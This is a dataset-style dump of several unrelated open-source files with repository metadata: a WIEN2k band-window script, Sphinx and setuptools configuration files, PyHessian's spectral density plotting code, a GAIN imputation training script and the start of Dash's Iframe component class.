] | 2 | 2016-07-22T15:46:56.000Z | 2016-08-02T15:05:12.000Z | #!/usr/bin/env python
# @Copyright 2007 Kristjan Haule
from scipy import *
def findNbands(Emin,Emax,enefiles,strfile):
    """Scan WIEN2k energy files and return the (nemin, nemax) band window.

    Counts, for every k-point in every energy file, how many band energies
    (converted from Ry to eV) lie below Emin and below Emax, and returns the
    overall minimum/maximum band indices covering the [Emin, Emax] window.
    Python 2 code: uses file.next() and print statements.
    """
    Ry2eV = 13.6056923
    # Find 'nat' (number of atoms) in the structure file; it sits at a fixed
    # column offset on the second line.
    fs = open(strfile,'r')
    fs.next()
    line = fs.next()
    lattic = line[:4]
    nat = int(line[4+23:4+23+3])
    fs.close()
    print 'Number of all atoms found in struct file', nat
    nemin=10000
    nemax=0
    for enefile in enefiles:
        # Find nemin,nemax in energy file
        fi = open(enefile,'r')
        # Skip the two linearization-energy header lines per atom.
        for i in range(nat):
            fi.next() # linearization Energy
            fi.next() # linearization Energy
        try:
            # Loop over k-point records until the file runs out
            # (StopIteration terminates the scan).
            for k in range(1,1000000):
                line = fi.next()
                # Fixed-width k-point header: coordinates, name, counts.
                S,T,Z = float(line[:19]),float(line[19:2*19]),float(line[2*19:3*19])
                KNAME = line[3*19:3*19+10]
                N, NEn = int(line[67:67+6]), int(line[67+6:67+6*2])
                nemin_=1
                nemax_=0
                for ii in range(NEn):
                    line = fi.next().split()
                    num, e1 = int(line[0]), float(line[1])
                    e1 *= Ry2eV
                    # Band counting: bands entirely below Emin raise nemin_,
                    # bands below Emax raise nemax_.
                    if (e1<Emin): nemin_ += 1
                    if (e1<Emax): nemax_ += 1
                nemin = min(nemin,nemin_)
                nemax = max(nemax,nemax_)
        except StopIteration:
            fi.close()
        print 'file:', enefile, 'nemin=', nemin, 'nemax=', nemax
    print 'Finally set nemin=', nemin, 'nemax=', nemax
    return (nemin,nemax)
if __name__ == '__main__':
    import os
    import sys
    import glob
    import re
    import utils
    Ry2eV = 13.6056923
    # Energy window around EF, either from the command line or defaults.
    if len(sys.argv)<3:
        exmin=-10
        exmax= 10
    else:
        exmin=float(sys.argv[1])
        exmax=float(sys.argv[2])
    print 'Energy window:', exmin, exmax
    w2k = utils.W2kEnvironment()
    # looking for EF: prefer EF.dat, then case.scf2(/up), then case.indmf1.
    if os.path.isfile('EF.dat'):
        EF = float(open('EF.dat').read())
    else:
        fname = w2k.case+".scf2"
        if os.path.isfile(fname) or os.path.isfile(fname+'up'):
            if os.path.isfile(fname):
                fscf = open(fname, 'r')
            else:
                fscf = open(fname+'up', 'r')
            lines = fscf.readlines()
            for line in lines:
                # The :FER line carries the Fermi energy in Ry.
                if re.match(r':FER', line) is not None:
                    EF = float(line[38:])*Ry2eV
                    print 'EF from scf file : ', EF
                    break
        else:
            EF =float(open(w2k.case+'.indmf1').readlines()[1].split()[1])
            print 'EF from indmf1 file : ', EF
    print 'EF=', EF
    #Emin,Emax = -1.331295, 18.668705
    Emin, Emax = EF+exmin, EF+exmax
    print 'Emin, Emax=', Emin, Emax
    strfile = w2k.case+'.struct'
    enefiles = glob.glob(w2k.case+'.energy'+'*')
    enefiles = filter(lambda fil: os.path.getsize(fil)>0, enefiles) # Remove empty files
    for fil in enefiles:
        if re.match(w2k.case+'.energyso', fil): # Spin-orbit on, remove non-spin-orbit files
            enefiles = filter(lambda fil: re.match(w2k.case+'.energyso', fil) is not None, enefiles) # Keep only spin-orbit energy files
            break
    print 'enefiles=', enefiles
    (nemin,nemax) = findNbands(Emin,Emax,enefiles,strfile)
    print 'nemin,nemax=', nemin, nemax
    print 'Replace second line of '+w2k.case+'.indmfl with'
    print nemin,nemax,1,4,'# hybridization nmin, nmax, renormalize for interstitials, projection type'
from scipy import *
def findNbands(Emin,Emax,enefiles,strfile):
Ry2eV = 13.6056923
fs = open(strfile,'r')
fs.next()
line = fs.next()
lattic = line[:4]
nat = int(line[4+23:4+23+3])
fs.close()
print 'Number of all atoms found in struct file', nat
nemin=10000
nemax=0
for enefile in enefiles:
fi = open(enefile,'r')
for i in range(nat):
fi.next()
fi.next()
try:
for k in range(1,1000000):
line = fi.next()
S,T,Z = float(line[:19]),float(line[19:2*19]),float(line[2*19:3*19])
KNAME = line[3*19:3*19+10]
N, NEn = int(line[67:67+6]), int(line[67+6:67+6*2])
nemin_=1
nemax_=0
for ii in range(NEn):
line = fi.next().split()
num, e1 = int(line[0]), float(line[1])
e1 *= Ry2eV
if (e1<Emin): nemin_ += 1
if (e1<Emax): nemax_ += 1
nemin = min(nemin,nemin_)
nemax = max(nemax,nemax_)
except StopIteration:
fi.close()
print 'file:', enefile, 'nemin=', nemin, 'nemax=', nemax
print 'Finally set nemin=', nemin, 'nemax=', nemax
return (nemin,nemax)
if __name__ == '__main__':
    import os
    import sys
    import glob
    import re
    import utils
    Ry2eV = 13.6056923
    # Energy window around EF, from the command line or defaults.
    if len(sys.argv)<3:
        exmin=-10
        exmax= 10
    else:
        exmin=float(sys.argv[1])
        exmax=float(sys.argv[2])
    print 'Energy window:', exmin, exmax
    w2k = utils.W2kEnvironment()
    # Locate EF: prefer EF.dat, then case.scf2(/up), then case.indmf1.
    if os.path.isfile('EF.dat'):
        EF = float(open('EF.dat').read())
    else:
        fname = w2k.case+".scf2"
        if os.path.isfile(fname) or os.path.isfile(fname+'up'):
            if os.path.isfile(fname):
                fscf = open(fname, 'r')
            else:
                fscf = open(fname+'up', 'r')
            lines = fscf.readlines()
            for line in lines:
                # The :FER line carries the Fermi energy in Ry.
                if re.match(r':FER', line) is not None:
                    EF = float(line[38:])*Ry2eV
                    print 'EF from scf file : ', EF
                    break
        else:
            EF =float(open(w2k.case+'.indmf1').readlines()[1].split()[1])
            print 'EF from indmf1 file : ', EF
    print 'EF=', EF
    Emin, Emax = EF+exmin, EF+exmax
    print 'Emin, Emax=', Emin, Emax
    strfile = w2k.case+'.struct'
    enefiles = glob.glob(w2k.case+'.energy'+'*')
    enefiles = filter(lambda fil: os.path.getsize(fil)>0, enefiles)  # drop empty files
    for fil in enefiles:
        if re.match(w2k.case+'.energyso', fil):  # spin-orbit run detected
            enefiles = filter(lambda fil: re.match(w2k.case+'.energyso', fil) is not None, enefiles)  # keep only spin-orbit files
            break
    print 'enefiles=', enefiles
    (nemin,nemax) = findNbands(Emin,Emax,enefiles,strfile)
    print 'nemin,nemax=', nemin, nemax
    print 'Replace second line of '+w2k.case+'.indmfl with'
    print nemin,nemax,1,4,'# hybridization nmin, nmax, renormalize for interstitials, projection type'
f723442118c4bb97e93ace12b12b7c779da0508f | 2,580 | py | Python | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 9 | 2020-12-29T02:12:36.000Z | 2021-11-15T17:26:48.000Z | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 5 | 2020-11-09T11:25:37.000Z | 2021-11-02T11:13:40.000Z | docs/conf.py | thijsmie/qiskit-quantum-knn | 7fbecab3644306cd601a7562b8f76a29d0190700 | [
"Apache-2.0"
] | 9 | 2020-11-11T20:19:00.000Z | 2022-02-06T16:17:34.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Make local extension helpers importable by Sphinx.
sys.path.insert(0, os.path.abspath('exts'))
sys.path.append('.')
# the most commonly used links in the docstrings are here (for extlinks)
from links import *
# -- Project information -----------------------------------------------------
project = 'qiskit-quantum-knn'
copyright = '2020, Daniël Kok'
author = 'Daniël Kok'
# The full version, including alpha/beta/rc tags
release = 'v1.0.0'
# -- General configuration ---------------------------------------------------
# Sphinx extension modules, as strings (builtin 'sphinx.ext.*' or custom).
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.coverage',
    'sphinx.ext.extlinks',
    'sphinx.ext.napoleon',
    'sphinx.ext.mathjax',
    'sphinx.ext.viewcode',
    'jupyter_sphinx'
]
# Document members in source order rather than alphabetically.
autodoc_member_order = 'bysource'
mathjax_path = 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
# Napoleon: Google-style docstrings, including documented private members.
napoleon_google_docstring = True
napoleon_include_private_with_doc = True
napoleon_use_param = False
napoleon_use_ivar = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# Decide whether module names are prepended to all object names.
add_module_names = False
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages.
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static'] | 33.947368 | 95 | 0.689147 |
# Sphinx configuration for the qiskit-quantum-knn documentation.
import os
import sys
# Make local extension helpers importable by Sphinx.
sys.path.insert(0, os.path.abspath('exts'))
sys.path.append('.')
# Commonly used docstring links (for sphinx.ext.extlinks).
from links import *
# -- Project information ------------------------------------------------------
project = 'qiskit-quantum-knn'
copyright = '2020, Daniël Kok'
author = 'Daniël Kok'
release = 'v1.0.0'
# -- General configuration ----------------------------------------------------
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.coverage',
    'sphinx.ext.extlinks',
    'sphinx.ext.napoleon',
    'sphinx.ext.mathjax',
    'sphinx.ext.viewcode',
    'jupyter_sphinx'
]
# Document members in source order rather than alphabetically.
autodoc_member_order = 'bysource'
mathjax_path = 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML'
# Napoleon: Google-style docstrings, including documented private members.
napoleon_google_docstring = True
napoleon_include_private_with_doc = True
napoleon_use_param = False
napoleon_use_ivar = True
templates_path = ['_templates']
# Do not prepend module names to object names.
add_module_names = False
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output --------------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static'] | true | true |
f72344764b087774bb46161e232b9792ee87baaa | 891 | py | Python | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | setup.py | paulnbrd/csgogsi | b0bfb422cd62f92c888c746a873c719bad45753c | [
"MIT"
] | null | null | null | import setuptools
import csgogsi
print("CSGOGSI Installation")
# Long description for PyPI comes straight from the README.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
setuptools.setup(
    name="csgogsi",  # distribution name on PyPI
    version=csgogsi.__version__,
    author=csgogsi.__author__,
    author_email="python-project@paulinux.fr",
    description="Counter-Strike: Global Offensive Game State Integration in Python",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/paulnbrd/csgogsi",
    project_urls={
        "Bug Tracker": "https://github.com/paulnbrd/csgogsi/issues",
    },
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    packages=setuptools.find_packages(),
    python_requires=">=3.6",
)
| 30.724138 | 84 | 0.687991 | import setuptools
import csgogsi
print("CSGOGSI Installation")
# Long description for PyPI comes straight from the README.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
setuptools.setup(
    name="csgogsi",  # distribution name on PyPI
    version=csgogsi.__version__,
    author=csgogsi.__author__,
    author_email="python-project@paulinux.fr",
    description="Counter-Strike: Global Offensive Game State Integration in Python",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/paulnbrd/csgogsi",
    project_urls={
        "Bug Tracker": "https://github.com/paulnbrd/csgogsi/issues",
    },
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    packages=setuptools.find_packages(),
    python_requires=">=3.6",
)
| true | true |
f72345e56a8064f220561bf4ec3d8ec66cad1198 | 2,486 | py | Python | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 357 | 2019-12-13T01:59:00.000Z | 2022-03-31T14:00:45.000Z | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 12 | 2020-02-15T13:08:02.000Z | 2022-03-28T04:03:37.000Z | density_plot.py | vikranth22446/PyHessian | e8b1fbadb24349eef8f3a137ecfd27dfc6e3bb53 | [
"MIT"
] | 62 | 2019-12-13T18:45:07.000Z | 2022-03-09T17:14:30.000Z | #*
# @file Different utility functions
# Copyright (c) Zhewei Yao, Amir Gholami
# All rights reserved.
# This file is part of PyHessian library.
#
# PyHessian is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyHessian is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyHessian. If not, see <http://www.gnu.org/licenses/>.
#*
import math
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def get_esd_plot(eigenvalues, weights):
    """Plot the eigenvalue spectral density on a log scale, saved to example.pdf.

    Args:
        eigenvalues: per-run eigenvalue estimates, shape (runs, m).
        weights: matching quadrature weights, shape (runs, m).
    """
    density, grids = density_generate(eigenvalues, weights)
    # Small epsilon keeps zero-density bins visible on the log axis.
    plt.semilogy(grids, density + 1.0e-7)
    plt.ylabel('Density (Log Scale)', fontsize=14, labelpad=10)
    # Bug fix: the x-axis label was misspelled 'Eigenvlaue'.
    plt.xlabel('Eigenvalue', fontsize=14, labelpad=10)
    plt.xticks(fontsize=12)
    plt.yticks(fontsize=12)
    plt.axis([np.min(eigenvalues) - 1, np.max(eigenvalues) + 1, None, None])
    plt.tight_layout()
    plt.savefig('example.pdf')
def density_generate(eigenvalues,
                     weights,
                     num_bins=10000,
                     sigma_squared=1e-5,
                     overhead=0.01):
    """Smooth per-run eigenvalue/weight estimates into a spectral density.

    Args:
        eigenvalues: per-run eigenvalue estimates, shape (runs, m).
        weights: matching quadrature weights, shape (runs, m).
        num_bins: number of grid points for the density.
        sigma_squared: base variance of the Gaussian smoothing kernel.
        overhead: padding added beyond the mean eigenvalue extremes.

    Returns:
        (density, grids): density values normalised to integrate to one
        over the uniform grid, and the grid itself.
    """
    eig = np.array(eigenvalues)
    wts = np.array(weights)
    # Grid spans the mean per-run extremes, padded by `overhead`.
    hi = np.mean(np.max(eig, axis=1), axis=0) + overhead
    lo = np.mean(np.min(eig, axis=1), axis=0) - overhead
    grids = np.linspace(lo, hi, num=num_bins)
    # Kernel variance scales with the spectral range (never below the base).
    sigma = sigma_squared * max(1, (hi - lo))
    runs = eig.shape[0]
    per_run = np.zeros((runs, num_bins))
    for run in range(runs):
        for idx, x in enumerate(grids):
            kernel = gaussian(eig[run, :], x, sigma)
            per_run[run, idx] = np.sum(kernel * wts[run, :])
    density = np.mean(per_run, axis=0)
    # Normalise so the density integrates to one over the grid.
    density = density / (np.sum(density) * (grids[1] - grids[0]))
    return density, grids
def gaussian(x, x0, sigma_squared):
    """Gaussian kernel with variance ``sigma_squared`` centred at ``x0``."""
    diff = x0 - x
    norm = np.sqrt(2 * np.pi * sigma_squared)
    return np.exp(-diff ** 2 / (2.0 * sigma_squared)) / norm
| 34.527778 | 77 | 0.672969 |
import math
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def get_esd_plot(eigenvalues, weights):
    """Plot the eigenvalue spectral density on a log scale, saved to example.pdf.

    Args:
        eigenvalues: per-run eigenvalue estimates, shape (runs, m).
        weights: matching quadrature weights, shape (runs, m).
    """
    density, grids = density_generate(eigenvalues, weights)
    # Small epsilon keeps zero-density bins visible on the log axis.
    plt.semilogy(grids, density + 1.0e-7)
    plt.ylabel('Density (Log Scale)', fontsize=14, labelpad=10)
    # Bug fix: the x-axis label was misspelled 'Eigenvlaue'.
    plt.xlabel('Eigenvalue', fontsize=14, labelpad=10)
    plt.xticks(fontsize=12)
    plt.yticks(fontsize=12)
    plt.axis([np.min(eigenvalues) - 1, np.max(eigenvalues) + 1, None, None])
    plt.tight_layout()
    plt.savefig('example.pdf')
def density_generate(eigenvalues,
                     weights,
                     num_bins=10000,
                     sigma_squared=1e-5,
                     overhead=0.01):
    """Smooth per-run eigenvalue/weight estimates into a spectral density.

    Returns (density, grids) with the density normalised to integrate to
    one over the uniform grid.
    """
    eigenvalues = np.array(eigenvalues)
    weights = np.array(weights)
    # Grid spans the mean per-run extremes, padded by `overhead`.
    lambda_max = np.mean(np.max(eigenvalues, axis=1), axis=0) + overhead
    lambda_min = np.mean(np.min(eigenvalues, axis=1), axis=0) - overhead
    grids = np.linspace(lambda_min, lambda_max, num=num_bins)
    # Kernel variance scales with the spectral range (never below the base).
    sigma = sigma_squared * max(1, (lambda_max - lambda_min))
    num_runs = eigenvalues.shape[0]
    density_output = np.zeros((num_runs, num_bins))
    for i in range(num_runs):
        for j in range(num_bins):
            x = grids[j]
            # Weighted Gaussian smoothing of run i's eigenvalues at grid point x.
            tmp_result = gaussian(eigenvalues[i, :], x, sigma)
            density_output[i, j] = np.sum(tmp_result * weights[i, :])
    density = np.mean(density_output, axis=0)
    # Normalise so the density integrates to one over the grid.
    normalization = np.sum(density) * (grids[1] - grids[0])
    density = density / normalization
    return density, grids
def gaussian(x, x0, sigma_squared):
    """Gaussian kernel with variance ``sigma_squared`` centred at ``x0``."""
    return np.exp(-(x0 - x)**2 /
                  (2.0 * sigma_squared)) / np.sqrt(2 * np.pi * sigma_squared)
| true | true |
f723473a1ae662d8cc65e47de582a5124c743744 | 4,677 | py | Python | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | 2 | 2022-01-13T13:05:38.000Z | 2022-01-17T10:06:58.000Z | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | null | null | null | evals/gain/gain_fixm.py | nokia/integratedimputation | ca72bda54cb66e99d79ff0b174cf8f99ccb554ba | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# © 2021 Nokia
#
# Licensed under the BSD 3 Clause license
# SPDX-License-Identifier: BSD-3-Clause
# http://proceedings.mlr.press/v80/yoon18a/yoon18a.pdf
import sys
sys.path.append('../../common/')
from defaults import *
from gain_ import train
from data_mobile import loadData, normData, foldData
from eval_ import EvalACC
import utils
sys.path.append('../../common/nets/')
from net_ae import NetAEConvTrans
from net_disc import NetDiscConvTrans
import numpy as np
import torch
import torch.utils.data
import argparse
# ==============================================================================
# Settings =====================================================================
parser = argparse.ArgumentParser()
parser.add_argument('--out_folder', default = './out_test')
parser.add_argument('--missing_type', default = 'ran')
parser.add_argument('--gpu_id', default = None, type = int)
parser.add_argument('--missing_rate_train', default = 0.5, type = float)
parser.add_argument('--fold', default = 0, type = int)
args = parser.parse_args()
out_folder = args.out_folder
missing_type = args.missing_type
gpu_id = args.gpu_id
missing_rate_train = args.missing_rate_train
fold = args.fold
# GAIN hyper-parameters: learning rates / weight decay for the
# autoencoder (generator) and discriminator, reconstruction weight
# alpha and discriminator steps per generator step.
lr_ae = 0.0001
wd_ae = 1e-05
lr_disc = 0.0001
wd_disc = 1e-05
alpha = 10
iter_disc = 5
# ==============================================================================
# Data =========================================================================
utils.makeFolders(out_folder)
values_np, labels_np = loadData()
values_np = normData(values_np)
values_np_train, values_np_test, labels_np_train, labels_np_test = foldData(values_np, labels_np, fold)
# ==============================================================================
# Data loaders =================================================================
dataset_train = torch.utils.data.TensorDataset(
    torch.tensor(values_np_train, dtype = torch.float),
    torch.tensor(labels_np_train, dtype = torch.long)
)
dataloader_train = torch.utils.data.DataLoader(
    dataset_train,
    batch_size = batch_size,
    shuffle = True,
    pin_memory = True,
    num_workers = 3
)
dataset_test = torch.utils.data.TensorDataset(
    torch.tensor(values_np_test, dtype = torch.float),
    torch.tensor(labels_np_test, dtype = torch.long)
)
dataloader_test = torch.utils.data.DataLoader(
    dataset_test,
    batch_size = batch_size,
    shuffle = False,
    pin_memory = True,
    num_workers = 3
)
# ==============================================================================
# Definitions ==================================================================
# Missingness generator: sequential ('seq') drops contiguous stretches,
# otherwise values are dropped at random.
if missing_type == 'seq':
    introduceMissingTrain = utils.IntroduceMissingSeq(missing_rate_train)
else:
    introduceMissingTrain = utils.IntroduceMissing(missing_rate_train)
# ==============================================================================
# Instantiation ================================================================
# Generator input is values concatenated with the mask (hence the * 2).
net_ae = NetAEConvTrans(values_np.shape[1] * 2, values_np.shape[1])
net_disc = NetDiscConvTrans(values_np.shape[1], values_np.shape[1])
eval_acc = EvalACC(values_np.shape[1] * 2, out_folder, fold, epochs_gain_fixm[0], eval_acc_every)
net_dict = {
    "net_ae": net_ae,
    "net_disc": net_disc
}
# ==============================================================================
# Move to GPU ==================================================================
device = torch.device("cuda:%d" % utils.gpuAssign(gpu_id))
net_ae.to(device)
net_disc.to(device)
eval_acc.to(device)
# ==============================================================================
# Opts =========================================================================
opt_ae = torch.optim.Adam(
    net_ae.parameters(),
    lr = lr_ae,
    weight_decay = wd_ae
)
opt_disc = torch.optim.Adam(
    net_disc.parameters(),
    lr = lr_disc,
    weight_decay = wd_disc
)
opt_dict = {
    "opt_ae": opt_ae,
    "opt_disc": opt_disc
}
# ==============================================================================
# Calls ========================================================================
train(
    alpha,
    iter_disc,
    introduceMissingTrain,
    net_dict,
    opt_dict,
    dataloader_train,
    dataloader_test,
    device,
    eval_every,
    out_folder,
    eval_acc,
    epochs_end = epochs_gain_fixm[1],
    epochs_start = epochs_gain_fixm[0]
)
| 29.23125 | 103 | 0.50139 |
# GAIN-style imputation training entry point (mobile dataset).
#
# Pipeline: parse CLI options -> load/normalise data -> train/test fold ->
# build DataLoaders -> inject artificial missingness -> instantiate the
# autoencoder/discriminator pair -> run the shared `train` loop.
import sys
sys.path.append('../../common/')
# NOTE(review): the star import supplies batch_size, eval_every,
# eval_acc_every and epochs_gain_fixm used below -- confirm in defaults.py.
from defaults import *
from gain_ import train
from data_mobile import loadData, normData, foldData
from eval_ import EvalACC
import utils
sys.path.append('../../common/nets/')
from net_ae import NetAEConvTrans
from net_disc import NetDiscConvTrans
import numpy as np
import torch
import torch.utils.data
import argparse
# --- Command-line interface ---------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('--out_folder', default = './out_test')
parser.add_argument('--missing_type', default = 'ran')  # 'seq' selects sequence-wise missingness
parser.add_argument('--gpu_id', default = None, type = int)
parser.add_argument('--missing_rate_train', default = 0.5, type = float)
parser.add_argument('--fold', default = 0, type = int)
args = parser.parse_args()
out_folder = args.out_folder
missing_type = args.missing_type
gpu_id = args.gpu_id
missing_rate_train = args.missing_rate_train
fold = args.fold
# --- Hyper-parameters -----------------------------------------------------------
lr_ae = 0.0001    # autoencoder learning rate
wd_ae = 1e-05     # autoencoder weight decay
lr_disc = 0.0001  # discriminator learning rate
wd_disc = 1e-05   # discriminator weight decay
alpha = 10        # forwarded to train(); presumably a loss weight -- see gain_.py
iter_disc = 5     # forwarded to train(); presumably discriminator steps per update -- see gain_.py
# --- Data -----------------------------------------------------------------------
utils.makeFolders(out_folder)
values_np, labels_np = loadData()
values_np = normData(values_np)
values_np_train, values_np_test, labels_np_train, labels_np_test = foldData(values_np, labels_np, fold)
dataset_train = torch.utils.data.TensorDataset(
    torch.tensor(values_np_train, dtype = torch.float),
    torch.tensor(labels_np_train, dtype = torch.long)
)
dataloader_train = torch.utils.data.DataLoader(
    dataset_train,
    batch_size = batch_size,
    shuffle = True,
    pin_memory = True,
    num_workers = 3
)
dataset_test = torch.utils.data.TensorDataset(
    torch.tensor(values_np_test, dtype = torch.float),
    torch.tensor(labels_np_test, dtype = torch.long)
)
dataloader_test = torch.utils.data.DataLoader(
    dataset_test,
    batch_size = batch_size,
    shuffle = False,  # deterministic evaluation order
    pin_memory = True,
    num_workers = 3
)
# --- Missingness injection -------------------------------------------------------
if missing_type == 'seq':
    introduceMissingTrain = utils.IntroduceMissingSeq(missing_rate_train)
else:
    introduceMissingTrain = utils.IntroduceMissing(missing_rate_train)
# --- Networks --------------------------------------------------------------------
# Autoencoder input is 2x the feature count (presumably values + mask; confirm in net_ae.py).
net_ae = NetAEConvTrans(values_np.shape[1] * 2, values_np.shape[1])
net_disc = NetDiscConvTrans(values_np.shape[1], values_np.shape[1])
eval_acc = EvalACC(values_np.shape[1] * 2, out_folder, fold, epochs_gain_fixm[0], eval_acc_every)
net_dict = {
    "net_ae": net_ae,
    "net_disc": net_disc
}
# --- Device ----------------------------------------------------------------------
device = torch.device("cuda:%d" % utils.gpuAssign(gpu_id))
net_ae.to(device)
net_disc.to(device)
eval_acc.to(device)
# --- Optimizers ------------------------------------------------------------------
opt_ae = torch.optim.Adam(
    net_ae.parameters(),
    lr = lr_ae,
    weight_decay = wd_ae
)
opt_disc = torch.optim.Adam(
    net_disc.parameters(),
    lr = lr_disc,
    weight_decay = wd_disc
)
opt_dict = {
    "opt_ae": opt_ae,
    "opt_disc": opt_disc
}
# --- Training ----------------------------------------------------------------------
train(
    alpha,
    iter_disc,
    introduceMissingTrain,
    net_dict,
    opt_dict,
    dataloader_train,
    dataloader_test,
    device,
    eval_every,
    out_folder,
    eval_acc,
    epochs_end = epochs_gain_fixm[1],
    epochs_start = epochs_gain_fixm[0]
)
| true | true |
f7234792e3b85750700c694b7ac0f1dbcec41a95 | 7,651 | py | Python | dash/html/Iframe.py | bkzhn/dash | 2975e001cf017919929b0ebad1f1d1e14fa32f93 | [
"MIT"
] | 1 | 2019-11-15T08:55:28.000Z | 2019-11-15T08:55:28.000Z | dash/html/Iframe.py | sthagen/dash | b3918ff798a51462687ff36e9e56c079c9f463cb | [
"MIT"
] | null | null | null | dash/html/Iframe.py | sthagen/dash | b3918ff798a51462687ff36e9e56c079c9f463cb | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Iframe(Component):
    """An Iframe component.
    Iframe is a wrapper for the <iframe> HTML5 element.
    For detailed attribute info see:
    https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

    Keyword arguments:

    - children (a list of or a singular dash component, string or number; optional):
        The children of this component.

    - id (string; optional):
        The ID of this component, used to identify dash components in
        callbacks. The ID needs to be unique across all of the components
        in an app.

    - accessKey (string; optional):
        Keyboard shortcut to activate or add focus to the element.

    - allow (string; optional):
        Specifies a feature-policy for the iframe.

    - aria-* (string; optional):
        A wildcard aria attribute.

    - className (string; optional):
        Often used with CSS to style elements with common properties.

    - contentEditable (string; optional):
        Indicates whether the element's content is editable.

    - contextMenu (string; optional):
        Defines the ID of a <menu> element which will serve as the
        element's context menu.

    - data-* (string; optional):
        A wildcard data attribute.

    - dir (string; optional):
        Defines the text direction. Allowed values are ltr (Left-To-Right)
        or rtl (Right-To-Left).

    - draggable (string; optional):
        Defines whether the element can be dragged.

    - height (string | number; optional):
        Specifies the height of elements listed here. For all other
        elements, use the CSS height property. Note: In some
        instances, such as <div>, this is a legacy attribute, in which
        case the CSS height property should be used instead.

    - hidden (a value equal to: 'hidden', 'HIDDEN' | boolean; optional):
        Prevents rendering of given element, while keeping child elements,
        e.g. script elements, active.

    - key (string; optional):
        A unique identifier for the component, used to improve performance
        by React.js while rendering components See
        https://reactjs.org/docs/lists-and-keys.html for more info.

    - lang (string; optional):
        Defines the language used in the element.

    - loading_state (dict; optional):
        Object that holds the loading state object coming from
        dash-renderer.

        `loading_state` is a dict with keys:

        - component_name (string; optional):
            Holds the name of the component that is loading.

        - is_loading (boolean; optional):
            Determines if the component is loading or not.

        - prop_name (string; optional):
            Holds which property is loading.

    - n_clicks (number; default 0):
        An integer that represents the number of times that this element
        has been clicked on.

    - n_clicks_timestamp (number; default -1):
        An integer that represents the time (in ms since 1970) at which
        n_clicks changed. This can be used to tell which button was
        changed most recently.

    - name (string; optional):
        Name of the element. For example used by the server to identify
        the fields in form submits.

    - referrerPolicy (string; optional):
        Specifies which referrer is sent when fetching the resource.

    - role (string; optional):
        The ARIA role attribute.

    - sandbox (string; optional):
        Stops a document loaded in an iframe from using certain features
        (such as submitting forms or opening new windows).

    - spellCheck (string; optional):
        Indicates whether spell checking is allowed for the element.

    - src (string; optional):
        The URL of the embeddable content.

    - srcDoc (string; optional)

    - style (dict; optional):
        Defines CSS styles which will override styles previously set.

    - tabIndex (string; optional):
        Overrides the browser's default tab order and follows the one
        specified instead.

    - title (string; optional):
        Text to be displayed in a tooltip when hovering over the element.

    - width (string | number; optional):
        For the elements listed here, this establishes the element's
        width. Note: For all other instances, such as <div>, this
        is a legacy attribute, in which case the CSS width property should
        be used instead."""

    @_explicitize_args
    def __init__(
        self,
        children=None,
        id=Component.UNDEFINED,
        n_clicks=Component.UNDEFINED,
        n_clicks_timestamp=Component.UNDEFINED,
        key=Component.UNDEFINED,
        role=Component.UNDEFINED,
        allow=Component.UNDEFINED,
